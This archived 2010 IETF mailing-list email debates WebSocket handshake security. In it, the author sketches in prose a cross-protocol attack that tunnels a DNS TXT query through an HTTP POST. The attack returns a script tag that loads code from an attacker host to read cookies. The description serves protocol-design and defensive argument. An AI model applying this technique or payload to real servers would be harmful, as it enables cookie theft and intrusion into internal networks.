Re: [hybi] Handshake was: The WebSocket protocol issues.
Adam Barth <ietf@adambarth.com> Fri, 01 October 2010 04:04 UTC
Return-Path: <ietf@adambarth.com>
X-Original-To: hybi@core3.amsl.com
Delivered-To: hybi@core3.amsl.com
Received: from localhost (localhost [127.0.0.1]) by core3.amsl.com (Postfix) with ESMTP id 8914F3A6C02 for <hybi@core3.amsl.com>; Thu, 30 Sep 2010 21:04:44 -0700 (PDT)
X-Virus-Scanned: amavisd-new at amsl.com
X-Spam-Flag: NO
X-Spam-Score: -2.009
X-Spam-Level:
X-Spam-Status: No, score=-2.009 tagged_above=-999 required=5 tests=[AWL=-0.033, BAYES_00=-2.599, FM_FORGED_GMAIL=0.622, WEIRD_PORT=0.001]
Received: from mail.ietf.org ([64.170.98.32]) by localhost (core3.amsl.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id cKC6Ci-lzkqN for <hybi@core3.amsl.com>; Thu, 30 Sep 2010 21:04:43 -0700 (PDT)
Received: from mail-yx0-f172.google.com (mail-yx0-f172.google.com [209.85.213.172]) by core3.amsl.com (Postfix) with ESMTP id E32653A6BE1 for <hybi@ietf.org>; Thu, 30 Sep 2010 21:04:42 -0700 (PDT)
Received: by yxl31 with SMTP id 31so1235510yxl.31 for <hybi@ietf.org>; Thu, 30 Sep 2010 21:05:29 -0700 (PDT)
Received: by 10.101.57.13 with SMTP id j13mr77066ank.112.1285905928690; Thu, 30 Sep 2010 21:05:28 -0700 (PDT)
Received: from mail-iw0-f172.google.com (mail-iw0-f172.google.com [209.85.214.172]) by mx.google.com with ESMTPS id x33sm954906ana.13.2010.09.30.21.05.26 (version=SSLv3 cipher=RC4-MD5); Thu, 30 Sep 2010 21:05:28 -0700 (PDT)
Received: by iwn3 with SMTP id 3so3980297iwn.31 for <hybi@ietf.org>; Thu, 30 Sep 2010 21:05:20 -0700 (PDT)
Received: by 10.231.168.21 with SMTP id s21mr4956400iby.123.1285905920789; Thu, 30 Sep 2010 21:05:20 -0700 (PDT)
MIME-Version: 1.0
Received: by 10.231.149.20 with HTTP; Thu, 30 Sep 2010 21:04:50 -0700 (PDT)
In-Reply-To: <AANLkTi=YTYsbYLiqiPdoJN=yxkWyMmEM5GT4VZbJTFwO@mail.gmail.com>
References: <AANLkTikszM0pVE-0dpZ2kv=i=y5yzS2ekeyZxtz9N=fQ@mail.gmail.com> <AANLkTikKc+4q_Q1+9uDo=ZpFF6S49i6vj2agZOGWVqKm@mail.gmail.com> <E2D38FF3-F1B9-4305-A7FC-A9690D2AEB4A@apple.com> <AANLkTikRYB_suPmSdH3uzGmdynozECRszDx+BpUvtZ4h@mail.gmail.com> <5CBF797D-A58E-4129-96B3-164F6E7409B9@apple.com> <4CA0D0D2.4040006@caucho.com> <AANLkTinACqm-GxUPhvFMf6_sGfeJofwy1r=28o=vgM43@mail.gmail.com> <4CA12810.8020006@caucho.com> <AANLkTimrMfXrnVMjU3f57L_sO7usyYQ56rBM4aMb2Pfr@mail.gmail.com> <20100928052501.GD12373@1wt.eu> <CA8029B0-71A3-44ED-88C6-934FE833BBA2@apple.com> <AANLkTim+fXj-h6OS3OdcfVfh3Q1UwxD8NLVawb=AWHX+@mail.gmail.com> <4FAC5C93-9BDF-4752-AFBC-162D718397AB@apple.com> <AANLkTikcH1W3bQwumqHbe-Yqa3XdoJqCa2b-mZuvoQ7g@mail.gmail.com> <9746E847-DC8B-45A7-ADF3-2ADB9DA7F82E@apple.com> <AANLkTik9igUwoxVrktoBoZrPoUW=Tjh7HyVbGJgQYes-@mail.gmail.com> <9F595226-FA0A-4C38-A6D0-0F4214BD7D21@apple.com> <4CA4BE10.1010709@caucho.com> <AANLkTi=wKFnNOuM+U3fktAFRn3R5OZ7c6PR2W3EAy7tm@mail.gmail.com> <4CA53E6B.1040808@caucho.com> <AANLkTikOyvF5AHTf4sDD=rWmK2FTD6R6LaHa4KTqkbcm@mail.gmail.com> <AANLkTi=YTYsbYLiqiPdoJN=yxkWyMmEM5GT4VZbJTFwO@mail.gmail.com>
From: Adam Barth <ietf@adambarth.com>
Date: Thu, 30 Sep 2010 21:04:50 -0700
Message-ID: <AANLkTim5d0TMJ=Z4_-eFNDw8ajyYmfx6V=UwS1Jya4Zq@mail.gmail.com>
To: Greg Wilkins <gregw@webtide.com>
Content-Type: text/plain; charset="ISO-8859-1"
Content-Transfer-Encoding: quoted-printable
Cc: hybi <hybi@ietf.org>
Subject: Re: [hybi] Handshake was: The WebSocket protocol issues.
X-BeenThere: hybi@ietf.org
X-Mailman-Version: 2.1.9
Precedence: list
List-Id: Server-Initiated HTTP <hybi.ietf.org>
List-Unsubscribe: <https://www.ietf.org/mailman/listinfo/hybi>, <mailto:hybi-request@ietf.org?subject=unsubscribe>
List-Archive: <http://www.ietf.org/mail-archive/web/hybi>
List-Post: <mailto:hybi@ietf.org>
List-Help: <mailto:hybi-request@ietf.org?subject=help>
List-Subscribe: <https://www.ietf.org/mailman/listinfo/hybi>, <mailto:hybi-request@ietf.org?subject=subscribe>
X-List-Received-Date: Fri, 01 Oct 2010 04:04:44 -0000
On Thu, Sep 30, 2010 at 8:27 PM, Greg Wilkins <gregw@webtide.com> wrote: > On 1 October 2010 12:36, Adam Barth <ietf@adambarth.com> wrote: >> On Thu, Sep 30, 2010 at 6:50 PM, Scott Ferguson <ferg@caucho.com> wrote: >>> To repeat the key pieces: >>> a) c-nonce must not be available to or predictable by the hijacker >>> b) "WebSocket" is not possessed by a non-websocket server >> >> You're making a bunch of assumptions about how non-websocket servers >> behave. In particular, consider a protocol like DNS. It's entirely >> possible that a DNS-like protocol could relay the c-nonce to the >> attacker and give the attacker an opportunity to response with the >> appropriate hash, which the server would then relay to the client. >> Attacks of this general class (even against DNS) are known for HTTP. > > At this stage in our deliberations we need a little more useful than a > statement that it is possible that protocol X might be vulnerable. > That is a truism - who would have thought TLS was vulnerable to a man > in the middle attack, but it was - so it is true that any protocol > might be vulnerable. The question is - how likely is it to be > vulnerable and are we doing anything to increase the chances of that? It's important to design security protocols with a margin for error because attacks only get better over time. If you design something that just barely resists exploits, chances are you'll be faced with live exploits soon. > Can you explain how a DNS like protocol might be vulnerable to a HTTP > handshake? Specially as it runs on port 53 which should not be > allowed to be the target of any HTTP or WS connections. That's another false assumption. For example, in Internet Explorer, you can direct an HTTP request to port 53. > Can you cite any references that indicate that if HTTP requests was > sent to a DNS server that it could be mistaken for DNS requests? I've personally done it, although I didn't publish the results. It's subtle and it requires some careful analysis, but it's quite possible. Here's how the attack works: 1) From http://attacker.com in the user's browser, generating an HTTP POST request to http://dns.example.com:53/ with a specially crafted entity-body (more on the entity body later). 2) Normally DNS servers use UDP, but many of them are actually listening on TCP for various historical reasons (something zone transfers not fitting in single UDP packet). 3) Over TCP, the first byte of the DNS protocol indicates the frame length. 4) The first byte of an HTTP POST request is an uppercase P, which indicates a moderate, but not excessively large frame. 5) Most (all?) DNS servers ignore garbage frames and move on to the next frame. 6) Given how things work out, the second frame ends up landing at a predicable location in the entity-body. 7) At that location in the entity-body, embed a frame for a DNS request for a TXT record from foo.attacker.com. 8) Reply to the request for the TXT record with the following text: <script src="http://attacker.com/haxor.js"></script> 9) The DNS server happily forwards the record to the user's browser. 10) The browser misinterprets the response as an HTTP/1.0 response with no Content-Type header. 11) The browser's content sniffing algorithm kicks in, sees the script tag, and decides to render the response is text/html. 12) The HTML then loads the script from http://attacker.com, which reads document.cookie. 13) Because cookies are shared between ports and subdomains, the attacker learns the user's cookie at example.com. Is this attack complicated? Yes. How many security failures had to conspire to make this attack possible? A ton. Did I actually get this to work? Not quite: Internet Explorer represents some classes of strings internally with null termination. At the time, it appeared to be impossible to generate an HTTP request that contains a null byte. It also appears to be impossible to construct a DNS frame that lacks a null byte (because DNS represents DNS names as a sequence of prefix length encoded fields with a zero-length field as a terminator). If I could insert a single null byte in the HTTP request, I would have been able to execute the rest of the attack. What do we learn from this story? The entire security property hung on the fact that IE's DOM strips null bytes. That's what I call fragile. > How would a WS HTTP upgrade request be any more likely to be so mistaken? > How would having spaces in the nonce make this mistake any less likely > to occur? How would framing the random bytes change this? Each layer of defense helps. Even with all the mitigations in the -76 handshake, I don't think it's sufficient. Now, that's an opinion. I don't have a concrete attack to give you. All I can do is argue from authority. By contrast, with the TLS-based handshake, I can give you a security argument that convinces reasonable people that the handshake resists cross-protocol attacks. No argument from authority needed. > Are there any recorded vulnerabilities of DNS servers echoing back any > content from a HTTP request? I didn't record it, but I got it to work in the lab. > If so, then I would expect these might > be already have been used as part of some XSS attack. Indeed. If not for the null byte issue, this would have been XSS against practically every domain on the Internet. > Reflecting user > data provided data is generally considered a bad thing to do and most > modern protocols only allow it in very limited situations (hence the > disabling of TRACE in HTTP). That's just nonsense. Almost every protocol can be made to reflect data provided by a third party. > Even if this was possible - what is the risk? Well, once I get past the handshake, WebSockets gives me an almost unrestricted TCP connection to the target server. If we weren't worried about what an attacker could do with unrestricted TCP connections to a server, we wouldn't need a handshake in the first place. > That a WS client will look up DNS names? If it's the DNS server for your corporate intranet, I can go find a bunch of interesting targets to attack on your network. Incidentally, DNS servers on internal networks are a very wide-spread example of servers using network connectivity as their sole means of authorization. > Or do you have any indication that a WS handshake > will make a DNS server more vulnerable to cache poisoning or any other > spoofing attack? You're overly focused on specifics. There's a lot more interesting things you can do with a DNS server than poison it's cache. There are a lost more interesting protocols to attack than DNS. It's a wild world out there. > Is there something about a WS handshake that would > better enable a cache poisoning attack more than XHR? If through some > miracle the handshake was passed, is there something about the WS > frames that would allow attacks on DNS servers more than XHR? Yes. Once you get past the handshake, you can read back bytes from the target server, which is difficult to do with XMLHttpRequest. > There are a few moderate proposals being made to incrementally improve > the handshake problems that we currently have. How does you statement > help us evaluate those proposals? This line of reasoning is analogous to you saying "let's use my home-grown block cipher unless you can show me a key-recovery attack." Just because I can't demonstrate a key-recovery attack against your home-grown block cipher doesn't means we should use it instead of AES. That you can't break your own handshake isn't surprising either. As Bruce Schneier is fond of saying, everyone can design a cryptosystem that they themselves cannot themselves break. Thanks, but no thanks. I'd rather use AES. Adam
- [hybi] Handshake was: The WebSocket protocol issu… Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Gabriel Montenegro
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Simone Bordet
- Re: [hybi] Handshake was: The WebSocket protocol … Alexander Voronin
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Simone Bordet
- Re: [hybi] Handshake was: The WebSocket protocol … Alexander Voronin
- Re: [hybi] Handshake was: The WebSocket protocol … James Graham
- Re: [hybi] Handshake was: The WebSocket protocol … Alexander Voronin
- Re: [hybi] Handshake was: The WebSocket protocol … John Tamplin
- Re: [hybi] Handshake was: The WebSocket protocol … Alexander Voronin
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Alexander Voronin
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Alexander Voronin
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Ian Hickson
- Re: [hybi] Handshake was: The WebSocket protocol … Mike Belshe
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Alexander Voronin
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Ian Hickson
- Re: [hybi] Handshake was: The WebSocket protocol … Patrick McManus
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Simon Pieters
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Simone Bordet
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Roderick Baier
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Simone Bordet
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Patrick McManus
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Bjoern Hoehrmann
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Bjoern Hoehrmann
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Bjoern Hoehrmann
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Bjoern Hoehrmann
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Eric Rescorla
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Bjoern Hoehrmann
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Bjoern Hoehrmann
- Re: [hybi] Handshake was: The WebSocket protocol … Bjoern Hoehrmann
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Bjoern Hoehrmann
- Re: [hybi] Handshake was: The WebSocket protocol … Eric Rescorla
- Re: [hybi] Handshake was: The WebSocket protocol … Eric Rescorla
- Re: [hybi] Handshake was: The WebSocket protocol … Bjoern Hoehrmann
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Bjoern Hoehrmann
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Eric Rescorla
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … James Graham
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Greg Wilkins
- Re: [hybi] Handshake was: The WebSocket protocol … Eric Rescorla
- Re: [hybi] Handshake was: The WebSocket protocol … James Graham
- Re: [hybi] Handshake was: The WebSocket protocol … Bjoern Hoehrmann
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Bjoern Hoehrmann
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Ian Fette (イアンフェッティ)
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Ian Hickson
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Ian Fette (イアンフェッティ)
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Patrick McManus
- Re: [hybi] Handshake was: The WebSocket protocol … Ian Fette (イアンフェッティ)
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Eric Rescorla
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Scott Ferguson
- Re: [hybi] Handshake was: The WebSocket protocol … Adam Barth
- Re: [hybi] Handshake was: The WebSocket protocol … Eric Rescorla
- Re: [hybi] Handshake was: The WebSocket protocol … Maciej Stachowiak
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Patrick McManus
- Re: [hybi] Handshake was: The WebSocket protocol … Patrick McManus
- Re: [hybi] Handshake was: The WebSocket protocol … Willy Tarreau
- Re: [hybi] Handshake was: The WebSocket protocol … Patrick McManus